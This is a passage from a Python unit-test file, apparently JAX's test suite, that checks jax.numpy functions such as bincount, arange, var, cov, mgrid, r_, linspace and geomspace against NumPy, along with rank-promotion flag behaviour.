self._CompileAndCheck(jnp_fun, args_maker)
if length is None:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker, check_dtypes=False)
def testBincountNegative(self):
# Test that jnp.bincount ignores negative values.
x_rng = jtu.rand_int(self.rng(), -100, 100)
w_rng = jtu.rand_uniform(self.rng())
shape = (1000,)
x = x_rng(shape, 'int32')
w = w_rng(shape, 'float32')
xn = np.array(x)
xn[xn < 0] = 0
wn = np.array(w)
np_result = np.bincount(xn[xn >= 0], wn[xn >= 0])
jnp_result = jnp.bincount(x, w)
self.assertAllClose(np_result, jnp_result, check_dtypes=False)
@parameterized.named_parameters(*jtu.cases_from_list(
{"testcase_name": "_case={}".format(i),
"input": input}
for i, input in enumerate([
3,
[3],
[np.array(3)],
[np.array([3])],
[[np.array(3)]],
[[np.array([3])]],
[3, 4, 5],
[
[np.eye(2, dtype=np.int32) * 2, np.zeros((2, 3), dtype=np.int32)],
[np.ones((3, 2), dtype=np.int32), np.eye(3, dtype=np.int32) * 3],
],
[np.array([1, 2, 3]), np.array([2, 3, 4]), 10],
[np.ones((2, 2), dtype=np.int32), np.zeros((2, 2), dtype=np.int32)],
[[np.array([1, 2, 3])], [np.array([2, 3, 4])]],
])))
def testBlock(self, input):
args_maker = lambda: [input]
self._CheckAgainstNumpy(np.block, jnp.block, args_maker)
self._CompileAndCheck(jnp.block, args_maker)
def testLongLong(self):
self.assertAllClose(np.int64(7), api.jit(lambda x: x)(np.longlong(7)))
@jtu.ignore_warning(category=UserWarning,
message="Explicitly requested dtype.*")
def testArange(self):
# test cases inspired by dask tests at
# https://github.com/dask/dask/blob/main/dask/array/tests/test_creation.py#L92
self.assertAllClose(jnp.arange(77),
np.arange(77, dtype=jnp.int_))
self.assertAllClose(jnp.arange(2, 13),
np.arange(2, 13, dtype=jnp.int_))
self.assertAllClose(jnp.arange(4, 21, 9),
np.arange(4, 21, 9, dtype=jnp.int_))
self.assertAllClose(jnp.arange(53, 5, -3),
np.arange(53, 5, -3, dtype=jnp.int_))
self.assertAllClose(jnp.arange(77, dtype=float),
np.arange(77, dtype=float))
self.assertAllClose(jnp.arange(2, 13, dtype=int),
np.arange(2, 13, dtype=int))
self.assertAllClose(jnp.arange(0, 1, -0.5),
np.arange(0, 1, -0.5, dtype=jnp.float_))
self.assertRaises(TypeError, lambda: jnp.arange())
# test that jnp.arange(N) doesn't instantiate an ndarray
self.assertNotEqual(type(jnp.arange(77)), type(np.arange(77)))
self.assertEqual(type(jnp.arange(77)), type(lax.iota(np.int32, 77)))
# test that jnp.arange(N, dtype=int32) doesn't instantiate an ndarray
self.assertNotEqual(type(jnp.arange(77, dtype=jnp.int32)),
type(np.arange(77, dtype=np.int32)))
self.assertEqual(type(jnp.arange(77, dtype=jnp.int32)),
type(lax.iota(np.int32, 77)))
def testArangeJit(self):
ans = api.jit(lambda: jnp.arange(5))()
expected = np.arange(5)
self.assertAllClose(ans, expected)
def testIssue830(self):
a = jnp.arange(4, dtype=jnp.complex64)
self.assertEqual(a.dtype, jnp.complex64)
def testIssue728(self):
assert jnp.allclose(jnp.eye(5000), np.eye(5000))
self.assertEqual(0, np.sum(jnp.eye(1050) - np.eye(1050)))
def testIssue746(self):
jnp.arange(12).reshape(3, 4) # doesn't crash
def testIssue764(self):
x = jnp.linspace(190, 200, 4)
f = api.grad(lambda x: jnp.sum(jnp.tanh(x)))
# Expected values computed with autograd in float64 precision.
expected = np.array([3.71669453e-165, 4.72999108e-168, 6.01954653e-171,
7.66067839e-174], np.float64)
self.assertAllClose(f(x), expected, check_dtypes=False)
def testIssue776(self):
"""Tests that the scatter-add transpose rule instantiates symbolic zeros."""
def f(u):
y = jnp.ones(10).at[np.array([2, 4, 5])].add(u)
# The transpose rule for lax.tie_in returns a symbolic zero for its first
# argument.
return lax.tie_in(y, 7.)
self.assertAllClose(np.zeros(3,), api.grad(f)(np.ones(3,)))
# NOTE(mattjj): I disabled this test when removing lax._safe_mul because this
# is a numerical stability issue that should be solved with a custom jvp rule
# of the sigmoid function being differentiated here, not by safe_mul.
# def testIssue777(self):
# x = jnp.linspace(-200, 0, 4, dtype=np.float32)
# f = api.grad(lambda x: jnp.sum(1 / (1 + jnp.exp(-x))))
# self.assertAllClose(f(x), np.array([0., 0., 0., 0.25], dtype=np.float32))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": jtu.format_test_name_suffix(op, [()], [dtype]),
"dtype": dtype, "op": op}
for dtype in float_dtypes
for op in ("sqrt", "arccos", "arcsin", "arctan", "sin", "cos", "tan",
"sinh", "cosh", "tanh", "arccosh", "arcsinh", "arctanh", "exp",
"log", "expm1", "log1p")))
def testMathSpecialFloatValues(self, op, dtype):
np_op = getattr(np, op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="invalid value.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="divide by zero.*")(np_op)
np_op = jtu.ignore_warning(category=RuntimeWarning,
message="overflow.*")(np_op)
jnp_op = getattr(jnp, op)
dtype = np.dtype(dtypes.canonicalize_dtype(dtype)).type
for x in (np.nan, -np.inf, -100., -2., -1., 0., 1., 2., 100., np.inf,
jnp.finfo(dtype).max, np.sqrt(jnp.finfo(dtype).max),
np.sqrt(jnp.finfo(dtype).max) * 2.):
if (op in ("sin", "cos", "tan") and
jtu.device_under_test() == "tpu"):
continue # TODO(b/132196789): fix and reenable.
x = dtype(x)
expected = np_op(x)
actual = jnp_op(x)
tol = jtu.tolerance(dtype, {np.float32: 1e-3, np.float64: 1e-7})
self.assertAllClose(expected, actual, atol=tol,
rtol=tol)
def testIssue883(self):
# from https://github.com/google/jax/issues/883
raise SkipTest("we decided to disallow arrays as static args")
@partial(api.jit, static_argnums=(1,))
def f(x, v):
return x
x = jnp.ones((10, 10))
v = jnp.array([1, 2, 3])
_ = f(x, v)
_ = f(x, v) # doesn't crash
def testReductionOfOutOfBoundsAxis(self): # Issue 888
x = jnp.ones((3, 4))
self.assertRaises(ValueError, lambda: jnp.sum(x, axis=2))
def testIssue956(self):
self.assertRaises(TypeError, lambda: jnp.ndarray((1, 1)))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
.format(shape, dtype, out_dtype, axis, ddof, keepdims),
"shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
"ddof": ddof, "keepdims": keepdims}
for shape in [(5,), (10, 5)]
for dtype in all_dtypes
for out_dtype in inexact_dtypes
for axis in [None, 0, -1]
for ddof in [0, 1, 2]
for keepdims in [False, True]))
def testVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.")
def np_fun(x):
out = np.var(x.astype(jnp.promote_types(np.float32, dtype)),
axis=axis, ddof=ddof, keepdims=keepdims)
return out.astype(out_dtype)
jnp_fun = partial(jnp.var, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
np.float64: 1e-3, np.complex128: 1e-6})
if (jnp.issubdtype(dtype, jnp.complexfloating) and
not jnp.issubdtype(out_dtype, jnp.complexfloating)):
self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
else:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
atol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_out_dtype={}_axis={}_ddof={}_keepdims={}"
.format(shape, dtype, out_dtype, axis, ddof, keepdims),
"shape": shape, "dtype": dtype, "out_dtype": out_dtype, "axis": axis,
"ddof": ddof, "keepdims": keepdims}
for shape in [(5,), (10, 5)]
for dtype in all_dtypes
for out_dtype in inexact_dtypes
for axis in [None, 0, -1]
for ddof in [0, 1, 2]
for keepdims in [False, True]))
def testNanVar(self, shape, dtype, out_dtype, axis, ddof, keepdims):
rng = jtu.rand_some_nan(self.rng())
args_maker = self._GetArgsMaker(rng, [shape], [dtype])
@jtu.ignore_warning(category=RuntimeWarning,
message="Degrees of freedom <= 0 for slice.")
def np_fun(x):
out = np.nanvar(x.astype(jnp.promote_types(np.float32, dtype)),
axis=axis, ddof=ddof, keepdims=keepdims)
return out.astype(out_dtype)
jnp_fun = partial(jnp.nanvar, dtype=out_dtype, axis=axis, ddof=ddof, keepdims=keepdims)
tol = jtu.tolerance(out_dtype, {np.float16: 1e-1, np.float32: 1e-3,
np.float64: 1e-3, np.complex128: 1e-6})
if (jnp.issubdtype(dtype, jnp.complexfloating) and
not jnp.issubdtype(out_dtype, jnp.complexfloating)):
self.assertRaises(ValueError, lambda: jnp_fun(*args_maker()))
else:
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, rtol=tol,
atol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name":
"_shape={}_dtype={}_y_shape={}_y_dtype={}_rowvar={}_ddof={}_bias={}_fweights={}_aweights={}".format(
shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights),
"shape": shape, "y_shape": y_shape, "dtype": dtype, "y_dtype": y_dtype,"rowvar": rowvar, "ddof": ddof,
"bias": bias, "fweights": fweights, "aweights": aweights}
for shape in [(5,), (10, 5), (5, 10)]
for dtype in all_dtypes
for y_dtype in [None, dtype]
for rowvar in [True, False]
for y_shape in _get_y_shapes(y_dtype, shape, rowvar)
for bias in [True, False]
for ddof in [None, 2, 3]
for fweights in [True, False]
for aweights in [True, False]))
def testCov(self, shape, dtype, y_shape, y_dtype, rowvar, ddof, bias, fweights, aweights):
rng = jtu.rand_default(self.rng())
wrng = jtu.rand_positive(self.rng())
wdtype = np.real(dtype(0)).dtype
wshape = shape[-1:] if rowvar or shape[0] == 1 else shape[:1]
args_maker = lambda: [rng(shape, dtype),
rng(y_shape, y_dtype) if y_dtype else None,
wrng(wshape, int) if fweights else None,
wrng(wshape, wdtype) if aweights else None]
kwargs = dict(rowvar=rowvar, ddof=ddof, bias=bias)
np_fun = lambda m, y, f, a: np.cov(m, y, fweights=f, aweights=a, **kwargs)
jnp_fun = lambda m, y, f, a: jnp.cov(m, y, fweights=f, aweights=a, **kwargs)
tol = {jnp.bfloat16: 5E-2, np.float16: 1E-2, np.float32: 1e-5,
np.float64: 1e-13, np.complex64: 1e-5, np.complex128: 1e-13}
tol = 7e-2 if jtu.device_under_test() == "tpu" else tol
tol = jtu.join_tolerance(tol, jtu.tolerance(dtype))
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False, tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol,
rtol=tol)
def testIssue967(self):
self.assertRaises(TypeError, lambda: jnp.zeros(1.5))
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shape={}_dtype={}_rowvar={}".format(
shape, dtype.__name__, rowvar),
"shape": shape, "dtype": dtype, "rowvar": rowvar}
for shape in [(5,), (10, 5), (3, 10)]
for dtype in number_dtypes
for rowvar in [True, False]))
def testCorrCoef(self, shape, dtype, rowvar):
rng = jtu.rand_default(self.rng())
def args_maker():
ok = False
while not ok:
x = rng(shape, dtype)
ok = not np.any(np.isclose(np.std(x), 0.0))
return (x,)
np_fun = partial(np.corrcoef, rowvar=rowvar)
np_fun = jtu.ignore_warning(
category=RuntimeWarning, message="invalid value encountered.*")(np_fun)
jnp_fun = partial(jnp.corrcoef, rowvar=rowvar)
tol = 1e-2 if jtu.device_under_test() == "tpu" else None
self._CheckAgainstNumpy(
np_fun, jnp_fun, args_maker, check_dtypes=False,
tol=tol)
self._CompileAndCheck(jnp_fun, args_maker, atol=tol, rtol=tol)
@parameterized.named_parameters(jtu.cases_from_list(
{"testcase_name": "_{}_{}_{}".format(jtu.format_shape_dtype_string(shape, dtype),
"None" if end_dtype is None else jtu.format_shape_dtype_string(end_shape, end_dtype),
"None" if begin_dtype is None else jtu.format_shape_dtype_string(begin_shape, begin_dtype)),
"shape": shape, "dtype": dtype, "end_shape": end_shape,
"end_dtype": end_dtype, "begin_shape": begin_shape,
"begin_dtype": begin_dtype}
for dtype in number_dtypes
for end_dtype in [None] + [dtype]
for begin_dtype in [None] + [dtype]
for shape in [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE]
for begin_shape in (
[None] if begin_dtype is None
else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])
for end_shape in (
[None] if end_dtype is None
else [s for s in all_shapes if s != jtu.PYTHON_SCALAR_SHAPE])))
def testEDiff1d(self, shape, dtype, end_shape, end_dtype, begin_shape,
begin_dtype):
rng = jtu.rand_default(self.rng())
args_maker = lambda: [rng(shape, dtype),
(None if end_dtype is None else rng(end_shape, end_dtype)),
(None if begin_dtype is None else rng(begin_shape, begin_dtype))]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testEDiff1dWithDtypeCast(self):
rng = jtu.rand_default(self.rng())
shape = jtu.NUMPY_SCALAR_SHAPE
dtype = jnp.float32
end_dtype = jnp.int32
args_maker = lambda: [rng(shape, dtype), rng(shape, end_dtype), rng(shape, dtype)]
np_fun = lambda x, to_end, to_begin: np.ediff1d(x, to_end, to_begin)
jnp_fun = lambda x, to_end, to_begin: jnp.ediff1d(x, to_end, to_begin)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_shapes={}_dtype={}_indexing={}_sparse={}".format(
shapes, dtype, indexing, sparse),
"shapes": shapes, "dtype": dtype, "indexing": indexing,
"sparse": sparse}
for shapes in [(), (5,), (5, 3)]
for dtype in number_dtypes
for indexing in ['xy', 'ij']
for sparse in [True, False]))
def testMeshGrid(self, shapes, dtype, indexing, sparse):
rng = jtu.rand_default(self.rng())
args_maker = self._GetArgsMaker(rng, [(x,) for x in shapes],
[dtype] * len(shapes))
np_fun = partial(np.meshgrid, indexing=indexing, sparse=sparse)
jnp_fun = partial(jnp.meshgrid, indexing=indexing, sparse=sparse)
self._CheckAgainstNumpy(np_fun, jnp_fun, args_maker)
self._CompileAndCheck(jnp_fun, args_maker)
def testMgrid(self):
assertAllEqual = partial(self.assertAllClose, atol=0, rtol=0)
assertAllEqual(np.mgrid[:4], jnp.mgrid[:4])
assertAllEqual(np.mgrid[:4,], jnp.mgrid[:4,])
assertAllEqual(np.mgrid[:4], jax.jit(lambda: jnp.mgrid[:4])())
assertAllEqual(np.mgrid[:5, :5], jnp.mgrid[:5, :5])
assertAllEqual(np.mgrid[:3, :2], jnp.mgrid[:3, :2])
assertAllEqual(np.mgrid[1:4:2], jnp.mgrid[1:4:2])
assertAllEqual(np.mgrid[1:5:3, :5], jnp.mgrid[1:5:3, :5])
assertAllEqual(np.mgrid[:3, :2, :5], jnp.mgrid[:3, :2, :5])
assertAllEqual(np.mgrid[:3:2, :2, :5], jnp.mgrid[:3:2, :2, :5])
# Corner cases
assertAllEqual(np.mgrid[:], jnp.mgrid[:])
# When the step length is a complex number, because of float calculation,
# the values between jnp and np might slightly different.
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.mgrid[-1:1:5j],
jnp.mgrid[-1:1:5j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[3:4:7j],
jnp.mgrid[3:4:7j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[1:6:8j, 2:4],
jnp.mgrid[1:6:8j, 2:4],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.mgrid[0:3.5:0.5],
jnp.mgrid[0:3.5:0.5],
atol=atol,
rtol=rtol)
self.assertAllClose(np.mgrid[1.3:4.2:0.3],
jnp.mgrid[1.3:4.2:0.3],
atol=atol,
rtol=rtol)
# abstract tracer value for jnp.mgrid slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.mgrid"):
jax.jit(lambda a, b: jnp.mgrid[a:b])(0, 2)
def testOgrid(self):
def assertListOfArraysEqual(xs, ys):
self.assertIsInstance(xs, list)
self.assertIsInstance(ys, list)
self.assertEqual(len(xs), len(ys))
for x, y in zip(xs, ys):
self.assertArraysEqual(x, y)
self.assertArraysEqual(np.ogrid[:5], jnp.ogrid[:5])
self.assertArraysEqual(np.ogrid[:5], jax.jit(lambda: jnp.ogrid[:5])())
self.assertArraysEqual(np.ogrid[1:7:2], jnp.ogrid[1:7:2])
# List of arrays
assertListOfArraysEqual(np.ogrid[:5,], jnp.ogrid[:5,])
assertListOfArraysEqual(np.ogrid[0:5, 1:3], jnp.ogrid[0:5, 1:3])
assertListOfArraysEqual(np.ogrid[1:3:2, 2:9:3], jnp.ogrid[1:3:2, 2:9:3])
assertListOfArraysEqual(np.ogrid[:5, :9, :11], jnp.ogrid[:5, :9, :11])
# Corner cases
self.assertArraysEqual(np.ogrid[:], jnp.ogrid[:])
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.ogrid[-1:1:5j],
jnp.ogrid[-1:1:5j],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.ogrid[0:3.5:0.3],
jnp.ogrid[0:3.5:0.3],
atol=atol,
rtol=rtol)
self.assertAllClose(np.ogrid[1.2:4.8:0.24],
jnp.ogrid[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
# abstract tracer value for ogrid slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.ogrid"):
jax.jit(lambda a, b: jnp.ogrid[a:b])(0, 2)
def testR_(self):
a = np.arange(6).reshape((2,3))
self.assertArraysEqual(np.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])],
jnp.r_[np.array([1,2,3]), 0, 0, np.array([4,5,6])])
self.assertArraysEqual(np.r_['-1', a, a], jnp.r_['-1', a, a])
self.assertArraysEqual(np.r_['0,2', [1,2,3], [4,5,6]], jnp.r_['0,2', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['0,2,0', [1,2,3], [4,5,6]], jnp.r_['0,2,0', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['1,2,0', [1,2,3], [4,5,6]], jnp.r_['1,2,0', [1,2,3], [4,5,6]])
# negative 1d axis start
self.assertArraysEqual(np.r_['0,4,-1', [1,2,3], [4,5,6]], jnp.r_['0,4,-1', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['0,4,-2', [1,2,3], [4,5,6]], jnp.r_['0,4,-2', [1,2,3], [4,5,6]])
# matrix directives
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
self.assertArraysEqual(np.r_['r',[1,2,3], [4,5,6]], jnp.r_['r',[1,2,3], [4,5,6]])
self.assertArraysEqual(np.r_['c', [1, 2, 3], [4, 5, 6]], jnp.r_['c', [1, 2, 3], [4, 5, 6]])
# bad directive
with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
jnp.r_["asdfgh",[1,2,3]]
# abstract tracer value for r_ slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.r_"):
jax.jit(lambda a, b: jnp.r_[a:b])(0, 2)
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.r_[-1:1:6j],
jnp.r_[-1:1:6j],
atol=atol,
rtol=rtol)
self.assertAllClose(np.r_[-1:1:6j, [0]*3, 5, 6],
jnp.r_[-1:1:6j, [0]*3, 5, 6],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.r_[1.2:4.8:0.24],
jnp.r_[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
def testC_(self):
a = np.arange(6).reshape((2, 3))
self.assertArraysEqual(np.c_[np.array([1,2,3]), np.array([4,5,6])],
jnp.c_[np.array([1,2,3]), np.array([4,5,6])])
self.assertArraysEqual(np.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])],
jnp.c_[np.array([[1,2,3]]), 0, 0, np.array([[4,5,6]])])
self.assertArraysEqual(np.c_['-1', a, a], jnp.c_['-1', a, a])
self.assertArraysEqual(np.c_['0,2', [1,2,3], [4,5,6]], jnp.c_['0,2', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['0,2,0', [1,2,3], [4,5,6]], jnp.c_['0,2,0', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['1,2,0', [1,2,3], [4,5,6]], jnp.c_['1,2,0', [1,2,3], [4,5,6]])
# negative 1d axis start
self.assertArraysEqual(np.c_['0,4,-1', [1,2,3], [4,5,6]], jnp.c_['0,4,-1', [1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['0,4,-2', [1,2,3], [4,5,6]], jnp.c_['0,4,-2', [1,2,3], [4,5,6]])
# matrix directives, avoid numpy deprecation warning
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=PendingDeprecationWarning)
self.assertArraysEqual(np.c_['r',[1,2,3], [4,5,6]], jnp.c_['r',[1,2,3], [4,5,6]])
self.assertArraysEqual(np.c_['c', [1, 2, 3], [4, 5, 6]], jnp.c_['c', [1, 2, 3], [4, 5, 6]])
# bad directive
with self.assertRaisesRegex(ValueError, "could not understand directive.*"):
jnp.c_["asdfgh",[1,2,3]]
# abstract tracer value for c_ slice
with self.assertRaisesRegex(jax.core.ConcretizationTypeError,
"slice start of jnp.c_"):
jax.jit(lambda a, b: jnp.c_[a:b])(0, 2)
# Complex number steps
atol = 1e-6
rtol = 1e-6
self.assertAllClose(np.c_[-1:1:6j],
jnp.c_[-1:1:6j],
atol=atol,
rtol=rtol)
# Non-integer steps
self.assertAllClose(np.c_[1.2:4.8:0.24],
jnp.c_[1.2:4.8:0.24],
atol=atol,
rtol=rtol)
def testS_(self):
self.assertEqual(np.s_[1:2:20],jnp.s_[1:2:20])
def testIndex_exp(self):
self.assertEqual(np.index_exp[5:3:2j],jnp.index_exp[5:3:2j])
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_retstep={}_dtype={}").format(
start_shape, stop_shape, num, endpoint, retstep,
dtype.__name__ if dtype else "None"),
"start_shape": start_shape, "stop_shape": stop_shape,
"num": num, "endpoint": endpoint, "retstep": retstep,
"dtype": dtype}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
for retstep in [True, False]
for dtype in number_dtypes + [None,]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLinspace(self, start_shape, stop_shape, num, endpoint, retstep, dtype):
if num == 1 and not endpoint and numpy_version < (1, 18):
raise SkipTest("Numpy < 1.18 has a linspace bug.")
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = jtu.tolerance(dtype if dtype else np.float32) * 10
args_maker = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])
start, stop = args_maker()
ndim = len(np.shape(start + stop))
for axis in range(-ndim, ndim):
jnp_op = lambda start, stop: jnp.linspace(
start, stop, num,
endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
# NumPy 1.20.0 changed the semantics of linspace to floor for integer
# dtypes.
if numpy_version >= (1, 20) or not np.issubdtype(dtype, np.integer):
np_op = lambda start, stop: np.linspace(
start, stop, num,
endpoint=endpoint, retstep=retstep, dtype=dtype, axis=axis)
else:
def np_op(start, stop):
out = np.linspace(start, stop, num, endpoint=endpoint,
retstep=retstep, axis=axis)
if retstep:
return np.floor(out[0]).astype(dtype), out[1]
else:
return np.floor(out).astype(dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
# floating-point compute between jitted platforms and non-jit + rounding
# cause unavoidable variation in integer truncation for some inputs.
if dtype in (inexact_dtypes + [None,]):
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=tol, rtol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": "_dtype={}".format(dtype), "dtype": dtype}
for dtype in number_dtypes))
def testLinspaceEndpoints(self, dtype):
"""Regression test for Issue #3014."""
rng = jtu.rand_default(self.rng())
endpoints = rng((2,), dtype)
out = jnp.linspace(*endpoints, 10, dtype=dtype)
self.assertAllClose(out[np.array([0, -1])], endpoints, rtol=0, atol=0)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_base={}_dtype={}").format(
start_shape, stop_shape, num, endpoint, base,
dtype.__name__ if dtype else "None"),
"start_shape": start_shape,
"stop_shape": stop_shape,
"num": num, "endpoint": endpoint, "base": base,
"dtype": dtype}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
for base in [10.0, 2, np.e]
for dtype in inexact_dtypes + [None,]))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testLogspace(self, start_shape, stop_shape, num,
endpoint, base, dtype):
if (dtype in int_dtypes and
jtu.device_under_test() in ("gpu", "tpu") and
not config.x64_enabled):
raise unittest.SkipTest("GPUx32 truncated exponentiation"
" doesn't exactly match other platforms.")
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = {np.float16: 2e-2, np.float32: 1e-2, np.float64: 1e-6,
np.complex64: 1e-3, np.complex128: 1e-6}
args_maker = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])
start, stop = args_maker()
ndim = len(np.shape(start + stop))
for axis in range(-ndim, ndim):
jnp_op = lambda start, stop: jnp.logspace(
start, stop, num, endpoint=endpoint, base=base, dtype=dtype, axis=axis)
@jtu.ignore_warning(category=RuntimeWarning,
message="overflow encountered in power")
def np_op(start, stop):
return np.logspace(start, stop, num, endpoint=endpoint,
base=base, dtype=dtype, axis=axis)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
if dtype in (inexact_dtypes + [None,]):
# Why do compiled and op-by-op float16 np.power numbers differ
# slightly more than expected?
atol = {np.float16: 1e-2}
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=atol, rtol=tol)
@parameterized.named_parameters(
jtu.cases_from_list(
{"testcase_name": ("_start_shape={}_stop_shape={}_num={}_endpoint={}"
"_dtype={}_axis={}").format(
start_shape, stop_shape, num, endpoint,
dtype.__name__ if dtype else "None", axis),
"start_shape": start_shape,
"stop_shape": stop_shape,
"num": num, "endpoint": endpoint,
"dtype": dtype, "axis": axis}
for start_shape in [(), (2,), (2, 2)]
for stop_shape in [(), (2,), (2, 2)]
for num in [0, 1, 2, 5, 20]
for endpoint in [True, False]
# NB: numpy's geomspace gives nonsense results on integer types
for dtype in inexact_dtypes + [None,]
for axis in range(-max(len(start_shape), len(stop_shape)),
max(len(start_shape), len(stop_shape)))))
@jax.numpy_rank_promotion('allow') # This test explicitly exercises implicit rank promotion.
def testGeomspace(self, start_shape, stop_shape, num,
endpoint, dtype, axis):
rng = jtu.rand_default(self.rng())
# relax default tolerances slightly
tol = {np.float16: 4e-3, np.float32: 2e-3, np.float64: 1e-14,
np.complex128: 1e-14}
def args_maker():
"""Test the set of inputs np.geomspace is well-defined on."""
start, stop = self._GetArgsMaker(rng,
[start_shape, stop_shape],
[dtype, dtype])()
# np.geomspace can't handle differently ranked tensors
# w. negative numbers!
start, stop = jnp.broadcast_arrays(start, stop)
if dtype in complex_dtypes:
return start, stop
# to avoid NaNs, non-complex start and stop cannot
# differ in sign, elementwise
start = start * jnp.sign(start) * jnp.sign(stop)
return start, stop
start, stop = args_maker()
def jnp_op(start, stop):
return jnp.geomspace(start, stop, num, endpoint=endpoint, dtype=dtype,
axis=axis)
def np_op(start, stop):
start = start.astype(np.float32) if dtype == jnp.bfloat16 else start
stop = stop.astype(np.float32) if dtype == jnp.bfloat16 else stop
return np.geomspace(
start, stop, num, endpoint=endpoint,
dtype=dtype if dtype != jnp.bfloat16 else np.float32,
axis=axis).astype(dtype)
self._CheckAgainstNumpy(np_op, jnp_op, args_maker,
check_dtypes=False, tol=tol)
if dtype in (inexact_dtypes + [None,]):
self._CompileAndCheck(jnp_op, args_maker,
check_dtypes=False, atol=tol, rtol=tol)
def testDisableNumpyRankPromotionBroadcasting(self):
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "allow"
jnp.ones(2) + jnp.ones((1, 2)) # works just fine
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "raise"
self.assertRaises(ValueError, lambda: jnp.ones(2) + jnp.ones((1, 2)))
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
try:
prev_flag = config.jax_numpy_rank_promotion
FLAGS.jax_numpy_rank_promotion = "warn"
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
jnp.ones(2) + jnp.ones((1, 2))
assert len(w) > 0
msg = str(w[-1].message)
expected_msg = ("Following NumPy automatic rank promotion for add on "
"shapes (2,) (1, 2).")
self.assertEqual(msg[:len(expected_msg)], expected_msg)
prev_len = len(w)
jnp.ones(2) + 3
self.assertEqual(len(w), prev_len) # don't want to warn for scalars
finally:
FLAGS.jax_numpy_rank_promotion = prev_flag
